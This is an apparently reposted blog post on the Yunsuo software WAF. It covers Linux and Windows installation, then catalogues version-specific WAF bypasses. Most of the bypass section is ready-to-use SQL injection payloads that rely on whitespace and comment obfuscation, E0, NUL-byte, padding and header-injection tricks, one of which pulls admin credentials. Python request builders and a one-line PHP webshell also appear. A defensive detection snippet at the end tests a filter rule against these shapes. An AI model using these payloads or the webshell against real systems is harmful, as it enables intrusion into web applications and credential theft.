Application Security - Security Devices - WAF Series - Software WAF - Yunsuo (云锁)
Published: 2019-06-14


Installation

Installation - Linux

Prerequisite: check the SELinux status; SELinux must be disabled.

getenforce    # "Disabled" means SELinux is off

1. Download

x86:

wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install/install

x64:

wget http://download.yunsuo.com.cn/v3/yunsuo_agent_64bit.tar.gz && tar xvzf yunsuo_agent_64bit.tar.gz && chmod +x yunsuo_install/install

2. Extract (make the installer executable)

chmod +x yunsuo_install/install

3. Run the installer from the current directory

yunsuo_install/install

4. Add the server to the cloud center.

/usr/local/yunsuo_agent/yunsuo_smart_tool.sh -u cloud_name -p cloud_passwd

Note: cloud_name is the cloud center account name; cloud_passwd is the cloud center login password.

5. Check the status

ps -ef | grep yunsuo_agent

Related commands

Yunsuo start / stop / restart / running status:

service yunsuo start/stop/restart/status
/etc/init.d/yunsuo start/stop/restart/status

Uninstall:

/usr/local/yunsuo_agent/uninstall

Installation - Windows

Download: http://download.yunsuo.com.cn/v3/%E4%BA%91%E9%94%81%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF(%E5%AE%89%E8%A3%85%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A).exe

Bypasses

GET/POST conversion + whitespace substitution

Applies where filtering is incomplete: search box + SQL injection + string-type parameter

?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23

union select + () bypass

?id=-1union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)

union select + '' + /**/ + ) + # bypass

?id='/*')union select user,database() from users%23*/&submit=Submit#

IIS + character-encoding bypass - Unicode

asp?t=112 %u00aand(s%u00f0lect top 1 eventname_en from eventshelp) > 0

WideChar / MultiByte character conversion issue - 2002

One-line webshell + China Chopper bypass

$_REQUEST['a']($_REQUEST['b']);
?>

Version 1.3.145 - oversized-request (padding) bypass

The part of the request beyond 7250 bytes is not inspected.

Version 1.3.145 - \x00 bypass

GET type:

def getdata(n):
    # NUL byte in the first parameter, SQL in the second one
    data = 'name=\x00test'
    data += '&id=select 1 from table'
    return data

POST type:

def postdata(n):
    # multipart body; the SQL sits in the "submit" part
    data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += '%27abcd\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += 'Content-Disposition: form-data; name="submit"\r\n\r\n'
    data += 'select 1 from table\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    return data

COOKIE type:

# request headers; the SQL sits in X-forwarded-For
header = {
    'User-Agent': 'letmetest',
    'Content-Type': 'multipart/form-data: boundary=----WebKitFormBoundarycMYRelX1B2H69xy9',
    'X-forwarded-For': 'select 1 from table'
}

Version 1.3.145 - E0 bypass

?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#

Version 1.3.191 - E0 + /**/ + current_user bypass

?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

Version 1.4.121 - POST and cookie data are not inspected by default, and header fields are not protected

Header - Client-ip injection

Client-ip: 1.2.3.4     'or @ `'` AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM pm_admin LIMIT 0,1)) a FROM information_schema.tables GROUP by a)b) or @ `'` and ''='
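
The gaps listed above share one cause: the filter matched a different string than the one the database ends up parsing. The following is an added example, not code from the original post or from Yunsuo, showing how a rule can be tested against canonical forms of every field; the rule and all names (`RULE`, `views`, `inspect_request`, `SAMPLES`) are hypothetical and deliberately crude, and the IIS `%u` encoding case is not covered.

```python
import re
from urllib.parse import parse_qsl

# Illustrative rule only (an assumption, far cruder than a production rule set).
RULE = re.compile(r"\bunion\b[\s(]*\bselect\b|\bselect\b.{1,200}?\bfrom\b", re.I | re.S)
COMMENT = re.compile(r"/\*.*?\*/", re.S)              # inline /* ... */ comments
CONTROL_WS = re.compile(r"[\x00-\x20]+")              # NUL, %09-%0D, space -> one space
DIGIT_GLUE = re.compile(r"(?<=\d)(?=union\b)", re.I)  # "8E0union" -> "8E0 union"


def views(decoded):
    """Canonical forms of one decoded value: comments kept, and comments stripped.

    Both are needed: stripping exposes union/*123*/select, while the raw form
    still sees a keyword that follows a quoted '/*' (a string literal to the
    database, not a comment).
    """
    out = []
    for text in (decoded, COMMENT.sub(" ", decoded)):
        text = CONTROL_WS.sub(" ", text)
        out.append(DIGIT_GLUE.sub(" ", text))
    return out


def inspect_request(query, headers):
    """Return the names of all fields (query parameters and headers) that match.

    Every field is checked over its full length: no cut-off after N bytes and
    no stop at the first NUL byte.
    """
    fields = parse_qsl(query, keep_blank_values=True) + list(headers.items())
    return [name for name, value in fields
            if any(RULE.search(v) for v in views(value))]


# Constructed samples in the shapes listed on this page (shortened).
SAMPLES = {
    "whitespace": ("type=2%0A%09%0B%0C%0D/**/and%0A(select%0A1%0Afrom%0At)", {}),
    "e0_comment": ("id=8E0union/*123*/select/*123*/1,2,3", {}),
    "paren": ("id=-1union(select 1,2,3)", {}),
    "quoted_comment": ("id='/*')union select user from users%23*/&submit=Submit", {}),
    "nul_first": ("name=\x00test&id=select 1 from table", {}),
    "padding": ("q=" + "a" * 8000 + " union select 1,2,3", {}),
    "header": ("id=1", {"Client-ip": "1.2.3.4 'or (SELECT 1 FROM t) or ''='"}),
    "benign": ("type=2&q=credit+union", {"User-Agent": "letmetest"}),
}

if __name__ == "__main__":
    for label, (query, headers) in SAMPLES.items():
        print(f"{label:15} -> {inspect_request(query, headers)}")
```

Matching only the comment-stripped form would miss the `quoted_comment` sample, and matching only the raw form would miss `e0_comment`, which is why both forms are checked.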


Reposted from: https://www.cnblogs.com/AtesetEnginner/p/11358064.html
